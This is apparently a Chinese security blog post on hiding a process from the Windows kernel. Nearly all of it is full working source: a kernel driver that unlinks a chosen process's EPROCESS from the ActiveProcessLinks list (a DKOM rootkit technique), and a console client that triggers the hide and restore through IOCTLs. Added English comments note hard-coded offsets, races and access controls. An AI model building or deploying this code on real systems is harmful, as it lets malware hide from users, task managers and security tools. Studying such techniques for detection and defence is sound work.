进程与线程-内核隐藏进程


  • 驱动代码
#include <ntifs.h>
#include <wdm.h>
#include <ntddk.h>
#include <ntstatus.h>

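/* Device and symbolic-link names shared by DriverEntry and DriverUnload. */
UNICODE_STRING Devicename;
UNICODE_STRING SymbolLink;

/*
 * Native object-manager paths. Every backslash has to be doubled in C source:
 * "\Device" and "\HideProcess" as written would contain the invalid escape
 * sequences "\D" and "\H", and the resulting name would never match what the
 * I/O manager creates. User mode reaches the link as "\\.\HideProcess" via
 * CreateFile.
 */
#define DEVICE_NAME       L"\\Device\\HideProcess"
#define SYMBOLICLINE_NAME L"\\??\\HideProcess"

/*
 * IOCTL codes. Function codes 0x000-0x7FF are reserved for Microsoft, so
 * vendor-defined codes start at 0x800. FILE_ANY_ACCESS means the caller's
 * handle needs no particular access right to issue the request; since the
 * device object is created without a security descriptor (see DriverEntry),
 * any local user can drive the process-hiding logic behind these codes.
 */
#define HIDE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define SHOW CTL_CODE(FILE_DEVICE_UNKNOWN, 0x900, METHOD_BUFFERED, FILE_ANY_ACCESS)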

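/*
 * Unload routine: removes the symbolic link and the device object created in
 * DriverEntry. The parameter is the DRIVER_OBJECT (the original name
 * "pDeviceObject" was misleading); the device hangs off its DeviceObject field.
 */
VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
{
    UNICODE_STRING symLink;

    /*
     * Build the link name locally instead of trusting the global SymbolLink:
     * if that global was never initialised, IoDeleteSymbolicLink is handed an
     * empty string, fails, and "\??\HideProcess" leaks until reboot.
     */
    RtlInitUnicodeString(&symLink, SYMBOLICLINE_NAME);
    IoDeleteSymbolicLink(&symLink);

    if (pDriverObject->DeviceObject != NULL)
    {
        IoDeleteDevice(pDriverObject->DeviceObject);
    }

    DbgPrint("EXIT!");
}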

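/*
 * IRP_MJ_CREATE handler: every CreateFile on the device succeeds.
 * IoStatus.Status is what user mode observes (GetLastError), IoStatus.Information
 * is the number of bytes returned — none here.
 */
NTSTATUS IrpCreateProc(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
{
    (void)pDeviceObject;

    DbgPrint("DispatchCreate ...\n");
    pIrp->IoStatus.Status = STATUS_SUCCESS;
    pIrp->IoStatus.Information = 0;
    IoCompleteRequest(pIrp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}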
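/*
 * IRP_MJ_CLOSE handler: completes the request with STATUS_SUCCESS and no data.
 * Nothing is tracked per handle, so there is nothing to release here.
 */
NTSTATUS IrpCloseProc(PDEVICE_OBJECT pdriver, PIRP pIrp)
{
    (void)pdriver;

    DbgPrint("DispatchClose ...\n");
    pIrp->IoStatus.Status = STATUS_SUCCESS;
    pIrp->IoStatus.Information = 0;
    IoCompleteRequest(pIrp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}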
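/*
 * IRP_MJ_DEVICE_CONTROL handler.
 *
 * The I/O manager packages a DeviceIoControl call as an IRP (header plus
 * IO_STACK_LOCATION). For METHOD_BUFFERED the input and output buffers are one
 * kernel copy, pIrp->AssociatedIrp.SystemBuffer, sized to the larger of the two
 * user-supplied lengths — and NULL when both are zero, so the lengths must be
 * checked before the buffer is touched.
 *
 * Protocol (32-bit values, matching the ring-3 client in this listing):
 *   HIDE  in: ULONG pid               out: ULONG token (EPROCESS address)
 *   SHOW  in: ULONG pid, ULONG token  out: nothing
 *
 * The hide is DKOM: the target's EPROCESS is unlinked from the ActiveProcessLinks
 * list that process enumeration walks. The process itself keeps running; only
 * enumerators that walk this list stop seeing it.
 *
 * Caveats a deployer must know:
 *  - ACTIVE_PROCESS_LINKS_OFFSET is build/architecture specific (see below).
 *  - The list is guarded by an unexported kernel lock; this code takes no lock,
 *    so a concurrent process creation or exit can race the pointer updates.
 *  - NOTE(review): on 64-bit Windows the kernel's integrity checks (PatchGuard)
 *    are reported to detect modified process lists and bugcheck — confirm for
 *    the target build.
 */

/*
 * Offset of EPROCESS.ActiveProcessLinks. The listing hard-codes 0x88, which is
 * only valid for one particular 32-bit Windows build; on any other build this
 * dereferences the wrong field and corrupts kernel memory. Check it with
 * `dt nt!_EPROCESS ActiveProcessLinks` in WinDbg before loading the driver.
 */
#define ACTIVE_PROCESS_LINKS_OFFSET 0x88

/*
 * The one process currently hidden (NULL if none). The reference obtained from
 * PsLookupProcessByProcessId is held here until SHOW, so the EPROCESS cannot be
 * freed and its address reused while user mode holds it as a token. It is also
 * what SHOW validates the user-supplied token against.
 */
static PEPROCESS g_HiddenProcess = NULL;

/* Address of the ActiveProcessLinks entry inside an EPROCESS. Pointer arithmetic
 * instead of the original (ULONG) cast, which truncates on 64-bit builds. */
static PLIST_ENTRY ActiveProcessLinksOf(PEPROCESS process)
{
    return (PLIST_ENTRY)((PUCHAR)process + ACTIVE_PROCESS_LINKS_OFFSET);
}

NTSTATUS IrpDeviceContrlProc(PDEVICE_OBJECT pdriver, PIRP pIrp)
{
    NTSTATUS status = STATUS_INVALID_DEVICE_REQUEST;
    PIO_STACK_LOCATION pIrpStack = IoGetCurrentIrpStackLocation(pIrp);
    ULONG uIoControlCode = pIrpStack->Parameters.DeviceIoControl.IoControlCode;
    PULONG pIoBuffer = (PULONG)pIrp->AssociatedIrp.SystemBuffer;
    ULONG uInLength = pIrpStack->Parameters.DeviceIoControl.InputBufferLength;
    ULONG uOutLength = pIrpStack->Parameters.DeviceIoControl.OutputBufferLength;
    ULONG_PTR bytesReturned = 0;

    (void)pdriver;

    switch (uIoControlCode)
    {
    case HIDE:
    {
        PEPROCESS target;
        PLIST_ENTRY self, prev, next;

        DbgPrint("HIDE");

        /* Both lengths come from user mode: validate before reading or writing. */
        if (pIoBuffer == NULL || uInLength < sizeof(ULONG) || uOutLength < sizeof(ULONG))
        {
            status = STATUS_BUFFER_TOO_SMALL;
            break;
        }
        /* A second HIDE would overwrite the stored reference and leak the first. */
        if (g_HiddenProcess != NULL)
        {
            status = STATUS_DEVICE_BUSY;
            break;
        }

        status = PsLookupProcessByProcessId((HANDLE)(ULONG_PTR)pIoBuffer[0], &target);
        if (!NT_SUCCESS(status))
        {
            /* Unknown PID: fail the IRP instead of reporting success with an
             * uninitialised output buffer, which the client would later feed to SHOW. */
            break;
        }

        DbgPrint("得到消息,目前 EPROCESS 地址为:0x%p", target);

        self = ActiveProcessLinksOf(target);
        prev = self->Blink;
        next = self->Flink;

        /* Unlink: make the neighbours point past us. */
        prev->Flink = next;
        next->Blink = prev;

        /* Point our own links at ourselves. If the hidden process exits while
         * unlinked, the kernel removes this entry again; with self-pointing links
         * that is a no-op instead of a write into whatever the old neighbours
         * have become. */
        self->Flink = self;
        self->Blink = self;

        g_HiddenProcess = target; /* keeps the lookup reference until SHOW */

        /* The token handed back is a raw kernel address — a kernel pointer
         * disclosure to user mode, kept only for compatibility with the client. */
        pIoBuffer[0] = (ULONG)(ULONG_PTR)target;
        bytesReturned = sizeof(ULONG);
        DbgPrint("pIoBuffer:%p\n", pIoBuffer);
        DbgPrint("断链成功!!!");
        break;
    }
    case SHOW:
    {
        PEPROCESS anchor;
        PLIST_ENTRY anchorLinks, hiddenLinks, next;

        DbgPrint("SHOW");

        if (pIoBuffer == NULL || uInLength < 2 * sizeof(ULONG))
        {
            status = STATUS_BUFFER_TOO_SMALL;
            break;
        }

        /* pIoBuffer[1] is a kernel address chosen by user mode. The original code
         * wrote Flink/Blink through it unconditionally — an arbitrary kernel write
         * for any user who can open the device. Only accept the exact pointer we
         * handed out in HIDE. */
        if (g_HiddenProcess == NULL ||
            (PVOID)(ULONG_PTR)pIoBuffer[1] != (PVOID)g_HiddenProcess)
        {
            status = STATUS_INVALID_PARAMETER;
            break;
        }

        status = PsLookupProcessByProcessId((HANDLE)(ULONG_PTR)pIoBuffer[0], &anchor);
        if (!NT_SUCCESS(status))
        {
            break;
        }
        if (anchor == g_HiddenProcess)
        {
            /* The hidden entry cannot be its own insertion point. */
            ObDereferenceObject(anchor);
            status = STATUS_INVALID_PARAMETER;
            break;
        }

        DbgPrint("得到消息,目前 EPROCESS 地址为:0x%p", anchor);

        anchorLinks = ActiveProcessLinksOf(anchor);
        hiddenLinks = ActiveProcessLinksOf(g_HiddenProcess);
        next = anchorLinks->Flink;

        /* Re-insert the hidden entry directly after the anchor process. */
        hiddenLinks->Flink = next;
        hiddenLinks->Blink = anchorLinks;
        anchorLinks->Flink = hiddenLinks;
        next->Blink = hiddenLinks;

        ObDereferenceObject(anchor);
        ObDereferenceObject(g_HiddenProcess); /* reference taken in HIDE */
        g_HiddenProcess = NULL;

        DbgPrint("恢复成功!!!");
        break;
    }
    default:
        /* Unknown control code: status stays STATUS_INVALID_DEVICE_REQUEST. */
        break;
    }

    pIrp->IoStatus.Status = status;
    pIrp->IoStatus.Information = NT_SUCCESS(status) ? bytesReturned : 0;
    IoCompleteRequest(pIrp, IO_NO_INCREMENT);
    return status;
}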

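/*
 * Driver entry point: registers the dispatch routines, creates the control
 * device and the symbolic link user mode opens.
 *
 * NOTE(review): IoCreateDevice attaches no security descriptor of its own, and
 * the IOCTLs are FILE_ANY_ACCESS, so "\\.\HideProcess" can be opened and driven
 * by any local user. Because the device lets its caller rewrite kernel process
 * lists, restrict it before use outside a lab — e.g. IoCreateDeviceSecure with
 * an SDDL such as SDDL_DEVOBJ_SYS_ALL_ADM_ALL (wdmsec.h/wdmsec.lib), or a
 * device ACL from the INF.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pdriver, PUNICODE_STRING reg_path)
{
    NTSTATUS status;
    PDEVICE_OBJECT pDevice = NULL;

    (void)reg_path;

    DbgPrint("Welcome Driver,\r\n");

    /* Install handlers before the device exists, so no request can ever reach a
     * NULL dispatch slot. */
    pdriver->MajorFunction[IRP_MJ_CREATE] = IrpCreateProc;
    pdriver->MajorFunction[IRP_MJ_CLOSE] = IrpCloseProc;
    pdriver->MajorFunction[IRP_MJ_DEVICE_CONTROL] = IrpDeviceContrlProc;
    pdriver->DriverUnload = DriverUnload;

    /* Initialise the file-scope names (the original used locals here and left the
     * globals empty, so DriverUnload could never delete the link). */
    RtlInitUnicodeString(&Devicename, DEVICE_NAME);
    RtlInitUnicodeString(&SymbolLink, SYMBOLICLINE_NAME);

    status = IoCreateDevice(pdriver, 0, &Devicename, FILE_DEVICE_UNKNOWN, 0, FALSE, &pDevice);
    if (!NT_SUCCESS(status))
    {
        DbgPrint("创建设备失败! \r\n");
        return status;
    }

    /* Buffered I/O for read/write IRPs; IOCTL buffering is chosen per control
     * code (METHOD_BUFFERED in the HIDE/SHOW definitions). */
    pDevice->Flags |= DO_BUFFERED_IO;

    /* The symbolic link is the name user mode can open with CreateFile. */
    status = IoCreateSymbolicLink(&SymbolLink, &Devicename);
    if (!NT_SUCCESS(status))
    {
        DbgPrint("创建符号链接失败!\r\n");
        IoDeleteDevice(pDevice);
        return status;
    }

    return STATUS_SUCCESS;
}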

  • 3环代码
// 进程隐藏.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>

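/*
 * Win32 path of the driver's symbolic link, i.e. "\\.\HideProcess". Every
 * backslash is doubled in the source; the single-backslash form in the
 * original listing does not resolve to the device.
 */
#define SYMBOLICLINE_NAME L"\\\\.\\HideProcess"

/* Must be identical to the driver's definitions: function codes 0x800 (hide)
 * and 0x900 (show), METHOD_BUFFERED, FILE_ANY_ACCESS. */
#define HIDE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define SHOW CTL_CODE(FILE_DEVICE_UNKNOWN, 0x900, METHOD_BUFFERED, FILE_ANY_ACCESS)

/* Handle to the opened device; set and closed in main(). */
HANDLE g_Device;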

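/*
 * Console client: reads a PID, asks the driver to hide it, waits for a key,
 * then asks the driver to restore it.
 *
 * HIDE sends the PID and receives a 4-byte token (the driver's handle for the
 * hidden process). SHOW sends { our own PID, token }; the driver re-links the
 * hidden process next to ours. SHOW is only attempted after a successful HIDE:
 * the token is otherwise uninitialised, and the driver treats it as a kernel
 * pointer.
 *
 * Returns 0 on success, 1 if the device cannot be opened, the PID is invalid or
 * the hide request fails.
 */
int main(int argc, char* argv[])
{
    DWORD pid = 0;
    DWORD token = 0;
    DWORD showArgs[2];
    DWORD bytesReturned = 0;

    (void)argc;
    (void)argv;

    g_Device = CreateFileW(SYMBOLICLINE_NAME, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                           OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (g_Device == INVALID_HANDLE_VALUE)
    {
        /* INVALID_HANDLE_VALUE is not a handle; nothing to close. */
        printf("g_Device Error (%lu)\n", GetLastError());
        return 1;
    }

    printf("请输入需要隐藏进程的 pid :\n");
    if (scanf("%lu", &pid) != 1 || pid == 0)
    {
        printf("pid ERROR!\n");
        CloseHandle(g_Device);
        system("pause");
        return 1;
    }

    if (!DeviceIoControl(g_Device, HIDE, &pid, sizeof(pid), &token, sizeof(token), &bytesReturned, NULL)
        || bytesReturned != sizeof(token))
    {
        printf("HIDE failed (%lu)\n", GetLastError());
        CloseHandle(g_Device);
        system("pause");
        return 1;
    }

    printf("SUCCESSE! PLEASE SEE");
    printf("检查任务管理器!\n");
    printf("outBuffer = %lx\n", token);
    system("pause");

    showArgs[0] = GetCurrentProcessId();
    showArgs[1] = token;
    if (DeviceIoControl(g_Device, SHOW, showArgs, sizeof(showArgs), &token, sizeof(token), &bytesReturned, NULL))
    {
        printf("恢复成功!\n");
    }
    else
    {
        printf("SHOW failed (%lu)\n", GetLastError());
    }

    CloseHandle(g_Device);
    system("pause");
    return 0;
}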


原文始发于微信公众号(loochSec):进程与线程-内核隐藏进程
